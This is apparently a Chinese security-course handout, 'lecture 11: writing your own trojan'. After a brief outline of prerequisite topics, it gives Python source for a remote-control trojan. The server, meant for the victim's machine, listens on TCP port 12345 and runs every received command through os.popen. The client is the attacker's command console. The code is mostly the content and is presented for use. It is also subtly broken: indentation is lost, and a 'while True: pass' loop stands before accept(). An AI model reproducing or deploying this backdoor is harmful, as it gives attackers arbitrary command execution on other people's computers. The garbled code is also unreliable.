T3SEC —–第十一讲:自编木马实战
自编 进入环境后可不依赖其他工具
自编远程控制电脑木马
涉及知识或技术:
操作系统
- win/linux/unix/android ........
- 命令,服务,特性.
网络协议
- osi七层网络
- tcp/ip 协议族群
- 应用层
- 传输层:tcp/udp
- 网络层
- 链路层
实用的程序语言
- python
- go
- ruby
- html,js
- 环境简单
- 弱规则语言
- 第三方强大的标准库
- 以及自定义的库或模块
打包工具
线上学习要素: 圈子(学习圈子),学什么怎么学,学习效果,拜师..
被攻击机:
#server:放在被攻击机-木马
#gui-dos-cmd
import os
from socket import *
#创建一个连接tcp
#
qq=socket(AF_INET,SOCK_STREAM)
#绑定主机ip
address = ("",12345)
qq.bind(address)
#监听
qq.listen(5)
while True:
pass
newsct,clientsct=qq.accept()
while True:
cmd = newsct.recv(4096)
#判断cmd是否有内容
if len(cmd)>0:
print("console:"+cmd.decode("utf-8"))
#以下可做控制操作
res=os.popen(cmd.decode('utf-8'),'r')
newsct.send(res.read().encode('utf-8'))
res.close()
else:
break
newsct.close()
攻击机:
#client
#控制端
from socket import *
#创建socket内容
tcpsocket=socket(AF_INET,SOCK_STREAM)
#连接
serAddress=('127.0.0.1',12345)
tcpsocket.connect(serAddress)
#操作
while True:
sendcmd=input("msf>>")
if len(sendcmd)>0:
tcpsocket.send(sendcmd.encode('utf-8'))
else:
break
#/接受执行后结果
recv=tcpsocket.recv(4096)
print(recv.decode('utf-8'))
#关闭socket
tcpsocket.close()